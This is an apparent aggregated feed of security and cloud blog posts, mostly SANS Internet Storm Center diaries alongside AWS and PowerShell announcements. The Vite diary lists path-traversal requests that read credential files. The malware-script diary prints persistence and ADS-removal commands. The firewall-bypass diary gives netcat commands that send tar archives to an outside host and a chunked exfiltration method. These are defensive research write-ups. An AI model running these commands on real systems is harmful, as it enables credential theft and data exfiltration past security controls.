Attempts to Exploit Exposed "Vite" Installs (CVE-2025-30208), (Thu, Apr 2nd)

This post was originally published on this site

From its GitHub repo: "Vite (French word for "quick", pronounced /vit/, like "veet") is a new breed of frontend build tooling that significantly improves the frontend development experience" [https://github.com/vitejs/vite].

This environment introduces some neat and useful shortcuts to make developers' lives simpler. But, as so often happens, these features can be turned against you if exposed.

Today, I noticed our honeypots collecting URLs like:

/@fs/../../../../../etc/environment?raw??
/@fs/etc/environment?raw??
/@fs/home/app/.aws/credentials?raw??

and many more like it. The common denominator is the prefix "/@fs/" and the ending '?raw??'. This pattern matches CVE-2025-30208, a vulnerability in Vite described by Offsec.com in July last year [https://www.offsec.com/blog/cve-2025-30208/]. 

The '@fs' feature is a Vite prefix for retrieving files from the server. To protect the server's file system, Vite implements configuration directives that restrict access to specific directories. However, the '?raw??' suffix can be used to bypass this access list and download arbitrary files. Scanning activity on port 5173 is quite low, and the attacks we have seen use standard web server ports.

Vite typically listens on port 5173. It should be installed such that it is only reachable via localhost, but attackers apparently believe it is often exposed. The attacks we are seeing attempt to retrieve various well-known configuration files, likely to extract secrets.
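For detection or self-assessment purposes, the observed pattern is easy to reconstruct. A minimal sketch (the paths mirror the honeypot logs above; `build_probe` is an illustrative helper, not part of Vite or any scanner):

```python
# Reconstruct the probe URLs seen in the honeypot logs: the "/@fs/" prefix
# serves files from disk, and the "?raw??" suffix bypasses Vite's fs.allow
# checks (CVE-2025-30208). Target paths below mirror the captured requests.
def build_probe(path: str) -> str:
    """Build a CVE-2025-30208-style request path for a target file."""
    return "/@fs/" + path.lstrip("/") + "?raw??"

probes = [build_probe(p) for p in (
    "../../../../../etc/environment",  # path traversal variant
    "/etc/environment",
    "/home/app/.aws/credentials",      # cloud credential theft
)]
```

Matching on the `/@fs/` prefix together with the `?raw??` ending is a reasonable first-pass log search for this activity.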


Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing managed daemon support for Amazon ECS Managed Instances


Today, we’re announcing managed daemon support for Amazon Elastic Container Service (Amazon ECS) Managed Instances. This new capability extends the managed instances experience we introduced in September 2025 by giving platform engineers independent control over software agents such as monitoring, logging, and tracing tools, without requiring coordination with application development teams. It also improves reliability by ensuring every instance consistently runs its required daemons, and it enables comprehensive host-level monitoring.

When running containerized workloads at scale, platform engineers manage a wide range of responsibilities, from scaling and patching infrastructure to keeping applications running reliably and maintaining the operational agents that support those applications. Until now, many of these concerns were tightly coupled. Updating a monitoring agent meant coordinating with application teams, modifying task definitions, and redeploying entire applications, a significant operational burden when you’re managing hundreds or thousands of services.

Decoupled lifecycle management for daemons
Amazon ECS now introduces a dedicated managed daemons construct that enables platform teams to centrally manage operational tooling. This separation of concerns allows platform engineers to independently deploy and update monitoring, logging, and tracing agents to infrastructure, while enforcing consistent use of required tools across all instances, without requiring application teams to redeploy their services. Daemons are guaranteed to start before application tasks and drain last, ensuring that logging, tracing, and monitoring are always available when your application needs them.

Platform engineers can deploy managed daemons across multiple capacity providers, or target specific ones, giving them flexibility in how they roll out agents across their infrastructure. Resource management is also centralized: teams can define daemon CPU and memory parameters separately from application configurations, with no need to rebuild AMIs or update task definitions. Resource utilization improves as well, since each instance runs exactly one copy of a daemon shared across multiple application tasks.

Let’s try it out
To take ECS Managed Daemons for a spin, I decided to start with the Amazon CloudWatch Agent as my first managed daemon. I had previously set up an Amazon ECS cluster with a Managed Instance capacity provider using the documentation.

From the Amazon Elastic Container Service console, I noticed a new Daemon task definitions option in the navigation pane, where I can define my managed daemons.

Managed daemons console

I chose Create new daemon task definition to get started. For this example, I configured the CloudWatch Agent with 1 vCPU and 0.5 GB of memory. In the Daemon task definition family field, I entered a name I’d recognize later.

For the Task execution role, I selected ecsTaskExecutionRole from the dropdown. Under the Container section, I gave my container a descriptive name and pasted in the image URI: public.ecr.aws/cloudwatch-agent/cloudwatch-agent:latest along with a few additional details.
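For reference, the daemon task definition created above corresponds roughly to the following sketch. The field names mirror the standard ECS task definition schema and are illustrative only; the actual daemon task definition parameters may differ, and the account ID and family name are placeholders:

```json
{
  "family": "cw-agent-daemon",
  "executionRoleArn": "arn:aws:iam::111122223333:role/ecsTaskExecutionRole",
  "cpu": "1024",
  "memory": "512",
  "containerDefinitions": [
    {
      "name": "cloudwatch-agent",
      "image": "public.ecr.aws/cloudwatch-agent/cloudwatch-agent:latest",
      "essential": true
    }
  ]
}
```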

After reviewing everything, I chose Create.

Once my daemon task definition was created, I navigated to the Clusters page, selected my previously created cluster and found the new Daemons tab.

Managed daemons 2

Here I chose the Create daemon button and completed the form to configure my daemon.

Managed daemons 3

Under Daemon configuration, I selected my newly created daemon task definition family and then assigned my daemon a name. For Environment configuration, I selected the ECS Managed Instances capacity provider I had set up earlier. After confirming my settings, I chose Create.

Now ECS automatically ensures the daemon task launches first on every provisioned ECS managed instance in my selected capacity provider. To see this in action, I deployed a sample nginx web service as a test workload. Once my workload was deployed, I could see in the console that ECS Managed Daemons had automatically deployed the CloudWatch Agent daemon alongside my application, with no manual intervention required.

When I later updated my daemon, ECS handled the rolling deployment automatically by provisioning new instances with the updated daemon, starting the daemon first, then migrating application tasks to the new instances before terminating the old ones. This “start before stop” approach ensures continuous daemon coverage: your logging, monitoring, and tracing agents remain operational throughout the update with no gaps in data collection. The drain percentage I configured controlled the pace of this replacement, giving me complete control over daemon updates without any application downtime.

How it works
The managed daemon experience introduces a new daemon task definition type that is separate from standard task definitions, with its own parameters and validation scheme. A new daemon_bridge network mode enables daemons to communicate with application tasks while remaining isolated from application networking configurations.

Managed daemons support advanced host-level access capabilities that are essential for operational tooling. Platform engineers can configure daemon tasks as privileged containers, add additional Linux capabilities, and mount paths from the underlying host filesystem. These capabilities are particularly valuable for monitoring and security agents that require deep visibility into host-level metrics, processes, and system calls.

When a daemon is deployed, ECS launches exactly one daemon process per container instance before placing application tasks. This guarantees that operational tooling is in place before your application starts receiving traffic. ECS also supports rolling deployments with automatic rollbacks, so you can update agents with confidence.

Now available
Managed daemon support for Amazon ECS Managed Instances is available today in all AWS Regions. To get started, visit the Amazon ECS console or review the Amazon ECS documentation, which also covers the new managed daemons APIs.

There is no additional cost to use managed daemons. You pay only for the standard compute resources consumed by your daemon tasks.

PowerShell 7.6 release postmortem and investments


We recently released PowerShell 7.6, and we want to take a moment to share context on the delayed
timing of this release, what we learned, and what we’re already changing as a result.

PowerShell releases typically align closely with the .NET release schedule. Our goal is to provide
predictable and timely releases for our users. For 7.6, we planned to release earlier in the cycle,
but ultimately shipped in March 2026.

What goes into a PowerShell release

Building and testing a PowerShell release is a complex process with many moving parts:

  • 3 to 4 release versions of PowerShell each month (e.g. 7.4.14, 7.5.5, 7.6.0)
  • 29 packages in 8 package formats
  • 4 architectures (x64, Arm64, x86, Arm32)
  • 8 operating systems (multiple versions each)
  • Published to 4 repositories (GitHub, PMC, winget, Microsoft Store) plus a PR to the .NET SDK image
  • 287,855 total tests run across all platforms and packages per release

What happened

The PowerShell 7.6 release was delayed beyond its original target and ultimately shipped in March
2026.

During the release cycle, we encountered a set of issues that affected packaging, validation, and
release coordination. These issues emerged late in the cycle and reduced our ability to validate
changes and maintain release cadence.

Combined with the standard December release pause, these factors extended the overall release
timeline.

Timeline

  • October 2025 – Packaging-related changes were introduced as part of ongoing work for the 7.6
    release.

    • Changes to the build created a bug in 7.6-preview.5 that caused the Alpine package to fail. The
      method used in the new build system to build the Microsoft.PowerShell.Native library wasn’t
      compatible with Alpine. This required additional changes for the Alpine build.
  • November 2025 – Additional compliance requirements were imposed requiring changes to packaging
    tooling for non-Windows platforms.

    • Because of the additional work created by these requirements, we weren’t able to ship the fixes
      made in October until December.
  • December 2025 – We shipped 7.6-preview.6, but due to the holidays there were complications
    caused by a change freeze and limited availability of key personnel.

    • We weren’t able to publish to PMC during the holiday freeze.
    • We couldn’t publish NuGet packages because the current manual process limits who can perform the
      task.
  • January 2026 – Packaging changes required deeper rework than initially expected and validation
    issues began surfacing across platforms.

    • We also discovered a compatibility issue in RHEL 8. The libpsl-native library must be built to
      support glibc 2.28 rather than glibc 2.33 used by RHEL 9 and higher.
  • February 2026 – Ongoing fixes, validation, and backporting of packaging changes across release
    branches continued.
  • March 2026 – Packaging changes stabilized, validation completed, and PowerShell 7.6 was
    released.

What went wrong and why

Several factors contributed to the delay beyond the initial packaging change.

  • Late-cycle packaging system changes
    A compliance requirement required us to replace the tooling used to generate non-Windows packages (RPM, DEB, PKG). We evaluated whether this could be addressed with incremental changes, but determined that the existing tooling could not be adapted to meet requirements. This required a
    full replacement of the packaging workflow.Because this change occurred late in the release cycle, we had limited time to validate the new system across all supported platforms and architectures.
  • Tight coupling to packaging dependencies
    Our release pipeline relied on this tooling as a critical dependency. When it became unavailable, we did not have an alternate implementation ready. This forced us to create a replacement for a core part of the release pipeline, from scratch, under time pressure, increasing both risk and complexity.
  • Reduced validation signal from previews
    Our preview cadence slowed during this period, which reduced opportunities to validate changes incrementally. As a result, issues introduced by the packaging changes were discovered later in the cycle, when changes were more expensive to correct.
  • Branching and backport complexity
    Because of new compliance requirements, changes needed to be backported and validated across multiple active branches. This increased the coordination overhead and extended the time required to reach a stable state.
  • Release ownership and coordination gaps
    Release ownership was not explicitly defined, particularly during maintainer handoffs. This made it difficult to track progress, assign responsibility for blockers, and make timely decisions during critical phases of the release.
  • Lack of early risk signals
    We did not have clear signals indicating that the release timeline was at risk. Without structured tracking of release health and ownership, issues accumulated without triggering early escalation or communication.

How we responded

As the scope of the issue became clear, we shifted from attempting incremental fixes to stabilizing
the packaging system as a prerequisite for release.

  • We evaluated patching the existing packaging workflow versus replacing it, and determined a full
    replacement was required to meet compliance requirements.
  • We rebuilt the packaging workflows for non-Windows platforms, including RPM, DEB, and PKG formats.
  • We validated the new packaging system across all supported architectures and operating systems to
    ensure correctness and consistency.
  • We backported the updated packaging logic across active release branches to maintain alignment
    between versions.
  • We coordinated across maintainers to prioritize stabilization work over continuing release
    progression with incomplete validation.

This shift ensured a stable and compliant release, but extended the overall timeline as we
prioritized correctness and cross-platform consistency over release speed.

Detection gap

A key gap during this release cycle was the lack of early signals indicating that the packaging
changes would significantly impact the release timeline.

Reduced preview cadence and late-cycle changes limited our ability to detect issues early.
Additionally, the absence of clear release ownership and structured tracking made it more difficult
to identify and communicate risk as it developed.

What we are doing to improve

This experience highlighted several areas where we can improve how we deliver releases. We’ve
already begun implementing changes:

  • Clear release ownership
    We have established explicit ownership for each release, with clear responsibility and transfer mechanisms between maintainers.
  • Improved release tracking
    We are using internal tracking systems to make release status and blockers more visible across the team.
  • Consistent preview cadence
    We are reinforcing a regular preview schedule to surface issues earlier in the cycle.
  • Reduced packaging complexity
    We are working to simplify and consolidate packaging systems to make future updates more predictable.
  • Improved automation
    We are exploring additional automation to reduce manual steps and improve reliability in the face of changing requirements.
  • Better communication signals
    We are identifying clearer signals in the release process to notify the community earlier when timelines are at risk. Going forward, we will share updates through the PowerShell repository discussions.

Moving forward

We understand that many of you rely on PowerShell releases to align with your own planning and
validation cycles. Improving release predictability and transparency is a priority for the team, and
these changes are already in progress.

We appreciate the feedback and patience we received from the community as we worked through these
changes, and we’re committed to continuing to improve how we deliver PowerShell.

— The PowerShell Team


TeamPCP Supply Chain Campaign: Update 005 – First Confirmed Victim Disclosure, Post-Compromise Cloud Enumeration Documented, and Axios Attribution Narrows, (Wed, Apr 1st)


This is the fifth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 004 covered developments through March 30, including the Databricks investigation, dual ransomware operations, and AstraZeneca data release. This update consolidates two days of intelligence through April 1, 2026.

Malicious Script That Gets Rid of ADS, (Wed, Apr 1st)


Today, most malware is described as “fileless” because it tries to reduce its footprint on the infected computer's filesystem to the bare minimum. But it still needs to write something… think about persistence. The registry can be used as an alternative storage location.

But some scripts still rely on files that are executed at boot time. For example, via a “Run” key:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v csgh4Pbzclmp /t REG_SZ /d ""%APPDATA%\Microsoft\Windows\Templates\dwm.cmd"" /f >nul 2>&1

The file located in %APPDATA% will be executed at boot time.

From the attacker’s point of view, there is a problem: The original script copies itself:

copy /Y "%~f0" "%APPDATA%\Microsoft\Windows\Templates\dwm.cmd" >nul 2>&1

Just after the copy operation, a PowerShell one-liner is executed:

powershell -w h -c "try{Remove-Item -Path '%APPDATA%\Microsoft\Windows\Templates\dwm.cmd:Zone.Identifier' -Force -ErrorAction SilentlyContinue}catch{}" >nul 2>&1

PowerShell will try to remove the alternate data stream (ADS) “:Zone.Identifier” that Windows adds during file operations. The Zone.Identifier stream indicates the source of the file (0 = Local machine, 1 = Local intranet, 2 = Trusted sites, 3 = Internet, 4 = Restricted sites). It's not clear whether a "copy" operation will drop or preserve the ADS. I did not find official Microsoft documentation, but if you ask an LLM, it will tell you that the stream is not preserved. That is wrong!
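The stream itself is a tiny INI-style payload. A minimal sketch (pure string handling; `build_zone_identifier` and `parse_zone_id` are illustrative helpers, not a Windows API) showing the format:

```python
# A Zone.Identifier stream holds a small INI-style payload, e.g.:
#   [ZoneTransfer]
#   ZoneId=3
# ZoneId=3 marks the file as downloaded from the Internet zone.

def build_zone_identifier(zone_id: int) -> str:
    """Build the content of a :Zone.Identifier stream."""
    return f"[ZoneTransfer]\r\nZoneId={zone_id}\r\n"

def parse_zone_id(stream: str) -> int:
    """Extract the ZoneId value from a stream's content."""
    for line in stream.splitlines():
        if line.startswith("ZoneId="):
            return int(line.split("=", 1)[1])
    raise ValueError("no ZoneId found")
```

On an NTFS volume, the stream can be read by opening the file path with the `:Zone.Identifier` suffix appended.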

In my Windows 10 lab, I downloaded a copy of BinaryNinja. An ADS was added to the file. After copying it to "test.ext", the new file still has the ADS!

By removing the ADS, the malicious script makes the file look less suspicious if the system is scanned for "downloaded" files (a classic operation performed in DFIR investigations).

For the record, the script later invokes another PowerShell one-liner that drops a DonutLoader on the victim's computer.

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing the AWS Sustainability console: Programmatic access, configurable CSV reports, and Scope 1–3 reporting in one place


As many of you are, I’m a parent. And like you, I think about the world I’m building for my children. That’s part of why today’s launch matters for many of us. I’m excited to announce the launch of the AWS Sustainability console, a standalone service that consolidates all AWS sustainability reporting and resources in one place.

With The Climate Pledge, Amazon set a goal in 2019 to reach net-zero carbon across its operations by 2040. That commitment shapes how AWS builds its data centers and services. AWS is also committed to helping you measure and reduce the environmental footprint of your own workloads. The AWS Sustainability console is the latest step in that direction.

The AWS Sustainability console builds on the Customer Carbon Footprint Tool (CCFT), which lives inside the AWS Billing console, and introduces a new set of capabilities you’ve been asking for.

Until now, accessing your carbon footprint data required billing-level permissions. That created a practical problem: sustainability professionals and reporting teams often don’t have (and shouldn’t need) access to cost and billing data. Getting the right people access to the right data meant navigating permission structures that weren’t designed with sustainability workflows in mind. The AWS Sustainability console has its own permissions model, independent of the Billing console. Sustainability professionals can now get direct access to emissions data without requiring billing permissions to be granted alongside it.

The console includes Scope 1, 2, and 3 emissions attributed to your AWS usage and shows a breakdown by AWS Region and by service, such as Amazon CloudFront, Amazon Elastic Compute Cloud (Amazon EC2), and Amazon Simple Storage Service (Amazon S3). The underlying data and methodology haven’t changed with this launch; they are the same as those used by the CCFT. What has changed is how you can access and work with the data.

As sustainability reporting requirements have grown more complex, teams need more flexibility accessing and working with their emissions data. The console now includes a Reports page where you can download preset monthly and annual carbon emissions reports covering both market-based method (MBM) and location-based method (LBM) data. You can also build a custom comma-separated values (CSV) report by selecting which fields to include, the time granularity, and other filters.

If your organization’s fiscal year doesn’t align with the calendar year, you can now configure the console to match your reporting period. When that is set, all data views and exports reflect your fiscal year and quarters, which removes a common friction point for finance and sustainability teams working in parallel.

You can also use the new API or the AWS SDKs to integrate emissions data into your own reporting pipelines, dashboards, or compliance workflows. This is useful for teams that need to pull data for a specific month across a large number of accounts without setting up a data export or for organizations that need to establish custom account groupings that don’t align with their existing AWS Organizations structure.

You can read about the latest features released and methodology updates directly on the Release notes page on the Learn more tab.

Let’s see it in action
To show you the Sustainability console, I opened the AWS Management Console and searched for “sustainability” in the search bar at the top of the screen.

Sustainability console - carbon emission 1

Sustainability console - carbon emission 2

The Carbon emissions section gives an estimate of your carbon emissions, expressed in metric tons of carbon dioxide equivalent (MTCO2e). It shows the emissions by scope, expressed using both the MBM and the LBM. On the right side of the screen, you can adjust the date range or filter by service, Region, and more.

For those unfamiliar: Scope 1 includes direct emissions from owned or controlled sources (for example, data center fuel use); Scope 2 covers indirect emissions from the production of purchased energy (with MBM accounting for energy attribute certificates and LBM using average local grid emissions); and Scope 3 includes other indirect emissions across the value chain, such as server manufacturing and data center construction. You can read more about this in our methodology document, which was independently verified by Apex, a third-party consultant.

I can also use the API or the AWS Command Line Interface (AWS CLI) to pull the emissions data programmatically.

aws sustainability get-estimated-carbon-emissions \
     --time-period='{"Start":"2025-03-01T00:00:00Z","End":"2026-03-01T23:59:59.999Z"}'

{
    "Results": [
        {
            "TimePeriod": {
                "Start": "2025-03-01T00:00:00+00:00",
                "End": "2025-04-01T00:00:00+00:00"
            },
            "DimensionsValues": {},
            "ModelVersion": "v3.0.0",
            "EmissionsValues": {
                "TOTAL_LBM_CARBON_EMISSIONS": {
                    "Value": 0.7,
                    "Unit": "MTCO2e"
                },
                "TOTAL_MBM_CARBON_EMISSIONS": {
                    "Value": 0.1,
                    "Unit": "MTCO2e"
                }
            }
        },
...
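Such a response can be folded into your own reporting pipeline. A small sketch (assuming only the JSON shape shown above; the values for the second month are made up for illustration) that totals the location-based emissions across months:

```python
# Sum the location-based (LBM) emissions across the monthly results in a
# get-estimated-carbon-emissions-style response (shape as shown above).
def total_lbm(response: dict) -> float:
    return sum(
        r["EmissionsValues"]["TOTAL_LBM_CARBON_EMISSIONS"]["Value"]
        for r in response["Results"]
    )

# Minimal sample mirroring the response structure; second month is invented.
sample = {
    "Results": [
        {"EmissionsValues": {
            "TOTAL_LBM_CARBON_EMISSIONS": {"Value": 0.7, "Unit": "MTCO2e"},
            "TOTAL_MBM_CARBON_EMISSIONS": {"Value": 0.1, "Unit": "MTCO2e"}}},
        {"EmissionsValues": {
            "TOTAL_LBM_CARBON_EMISSIONS": {"Value": 0.5, "Unit": "MTCO2e"},
            "TOTAL_MBM_CARBON_EMISSIONS": {"Value": 0.2, "Unit": "MTCO2e"}}},
    ]
}
```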

The combination of the visual console and the new API gives you two additional ways to work with your data, alongside the Data Exports that remain available. You can now explore and identify hotspots in the console and automate the reporting you want to share with stakeholders.

The Sustainability console is designed to grow. We plan to keep releasing new features as we expand its capabilities alongside our customers.

Get started today
The AWS Sustainability console is available today at no additional cost. You can access it from the AWS Management Console. Historical data is available going back to January 2022, so you can start exploring your emissions trends right away.

Get started on the console today. If you want to learn more about the AWS commitment to sustainability, visit the AWS Sustainability page.

— seb

Application Control Bypass for Data Exfiltration, (Tue, Mar 31st)


In case of a cyber incident, most organizations fear data loss (via exfiltration) more than plain data encryption, because they have a good backup policy in place. If exfiltration happens, it means a total loss of control over the stolen data, with all the consequences (PII, credit card numbers, …).

While performing a security assessment of a corporate network, I discovered that a TCP port was open to the wild Internet, even though the audited company had a pretty strong firewall policy. The open port was discovered via a regular port scan. In such a situation, you try to exploit this "hole" in the firewall, so I tried to exfiltrate data through this port. It’s easy: simulate a server controlled by a threat actor:

root@attacker:~# nc -l -p 12345 >/tmp/victim.tgz

And, from a server on the victim’s network:

root@victim:~# tar czvf - /juicy/data/to/exfiltrate | nc wild.server.com 12345

It worked, but the data transfer failed after approximately 5KB of data sent… weird! Every time, the same situation. I talked to a local network administrator, who said that they have a Palo Alto Networks firewall in place with App-ID enabled on this port.

Note: What I am explaining here is not directly related to this brand of firewall. The same issue may apply to any “next-generation” firewall! For example, Check Point firewalls use the App Control blade and Fortinet firewalls use “Application Control”.

App-ID in Palo Alto Networks firewalls is the component performing traffic classification on the protected network(s), regardless of port, protocol, or encryption. Instead of relying on traditional port-based rules (e.g., TCP/80 == HTTP), App-ID analyzes traffic in real time to determine the actual application (e.g., Facebook, Dropbox, custom apps), enabling more granular and accurate security policies. This allows administrators to permit, deny, or control applications directly, apply user-based rules, and enforce security profiles (IPS, URL filtering, etc.) based on the true nature of the traffic rather than superficial indicators like ports. This also prevents well-known protocols from being used on exotic ports (e.g., SSH over 12222).

The main limitation of this technique is that enough packets must cross the wire before a reliable classification can be made. So the traffic is always allowed at first and, if something bad is detected, the remaining packets are blocked.

In terms of data volume, there’s no strict fixed threshold, but in practice App-ID usually needs at least the first few KB of application payload to reach a reliable classification. Roughly speaking:

  • <1 KB (or just handshake packets): almost always insufficient → likely unknown or very generic classification
  • ~1–5 KB: basic identification possible for simple or clear-text protocols (HTTP, DNS, some TLS SNI-based detection)
  • ~5–10+ KB: much higher confidence, especially for encrypted or complex applications

That’s why my attempts to exfiltrate data were all blocked after ~5KB.

Can we bypass this? Let’s try the following scenario:

On the external host (managed by me, the "Threat Actor"), let’s execute netcat in an infinite loop with a small timeout (because the firewall won’t drop the connection, just block packets):

i=0
while true; do
    filename=$(printf "/tmp/chunk_%04d.bin" "$i")
    # -w 5: time out after 5 seconds of inactivity, then loop for the next chunk
    nc -l -p 12345 -v -v -w 5 >"$filename"
    echo "Dumped $filename"
    ((i++))
done

On the victim’s computer, I (vibe-)coded a Python script that performs the following tasks:
– Read a file
– Split it into chunks of 3KB
– Send everything over a TCP connection (with retries in case of failure, of course)
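A minimal sketch of that logic (an illustrative reimplementation, not the Pastebin script; the host, port, and chunk size are parameters chosen to match the write-up):

```python
import socket
import sys
import time

CHUNK_SIZE = 3072  # 3KB chunks: small enough to complete before App-ID classifies

def chunk_bytes(data: bytes, size: int = CHUNK_SIZE) -> list:
    """Split data into fixed-size chunks (the last one may be shorter)."""
    return [data[i:i + size] for i in range(0, len(data), size)]

def send_chunks(path: str, host: str, port: int, max_retries: int = 10) -> None:
    """Send each chunk over its own short-lived TCP connection, with retries."""
    with open(path, "rb") as f:
        chunks = chunk_bytes(f.read())
    for n, chunk in enumerate(chunks, 1):
        for attempt in range(1, max_retries + 1):
            try:
                with socket.create_connection((host, port), timeout=5) as s:
                    s.sendall(chunk)
                print(f"Chunk {n}/{len(chunks)} sent successfully (attempt {attempt}).")
                break
            except OSError:
                time.sleep(1)  # back off, then retry this chunk
        else:
            sys.exit(f"Chunk {n} failed after {max_retries} attempts")
```

The receiving loop shown above then writes one file per connection, and the chunks are concatenated afterwards.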

The code is available on Pastebin[1]. Example:

root@victim:~# sha256sum data.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  data.zip
root@victim:~# python3 send_file.py data.zip wild.server.com 12345
File: 'data.zip' (359370 bytes) -> 117 chunk(s) of up to 3072 bytes.
Destination: wild.server.com:12345  (timeout=5s, max_retries=10)

  Chunk 1/117 sent successfully (attempt 1).
  Chunk 2/117 sent successfully (attempt 1).
  Chunk 3/117 sent successfully (attempt 1).
  Chunk 4/117 sent successfully (attempt 1).
  Chunk 5/117 sent successfully (attempt 1).
  Chunk 6/117 sent successfully (attempt 1).
  Chunk 7/117 sent successfully (attempt 1).
  Chunk 8/117 sent successfully (attempt 1).
  Chunk 9/117 sent successfully (attempt 1).
  Chunk 10/117 sent successfully (attempt 1).
  Chunk 11/117 sent successfully (attempt 1).
  Chunk 12/117 sent successfully (attempt 1).
  [...]

And on the remote side, chunks are created, you just need to rebuild the original file:

root@attacker:~# cat /tmp/chunk_0* >victim.zip
root@attacker:~# sha256sum victim.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  victim.zip

The file has been successfully exfiltrated! (The SHA256 hashes are identical.) Of course, it's slow, but it does not generate bandwidth peaks that could reveal a huge amount of data being exfiltrated!

This technique worked for me with a file of a few megabytes. It is more of a proof-of-concept, because firewalls may implement additional detection controls. For example, this technique is easy to detect due to the high number of small TCP connections, which may look like malware beaconing. It could also be useful to encrypt your data, because the packets could be flagged by the IDS component of the firewall…

[1] https://pastebin.com/Ct9ePEiN

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TeamPCP Supply Chain Campaign: Update 004 – Databricks Investigating Alleged Compromise, TeamPCP Runs Dual Ransomware Operations, and AstraZeneca Data Released, (Mon, Mar 30th)


This is the fourth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 003 covered developments through March 28, including the first 48-hour pause in new compromises and the campaign's shift to monetization. This update consolidates intelligence from March 28-30, 2026 — two days since our last update.

DShield (Cowrie) Honeypot Stats and When Sessions Disconnect, (Mon, Mar 30th)


A lot of the information seen on DShield honeypots [1] is repeated bot traffic, especially when looking at the Cowrie [2] telnet and SSH sessions. However, how long a session lasts, how many commands are run per session, and what the last commands are before a session disconnects can vary. Some of this information could help indicate whether a session is automated and whether a honeypot was fingerprinted. This information can also be used to find more interesting honeypot sessions.

TeamPCP Supply Chain Campaign: Update 003 – Operational Tempo Shift as Campaign Enters Monetization Phase With No New Compromises in 48 Hours, (Sat, Mar 28th)


This is the third update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 002 covered developments through March 27, including the Telnyx PyPI compromise and Vect ransomware partnership. This update covers developments from March 27-28, 2026.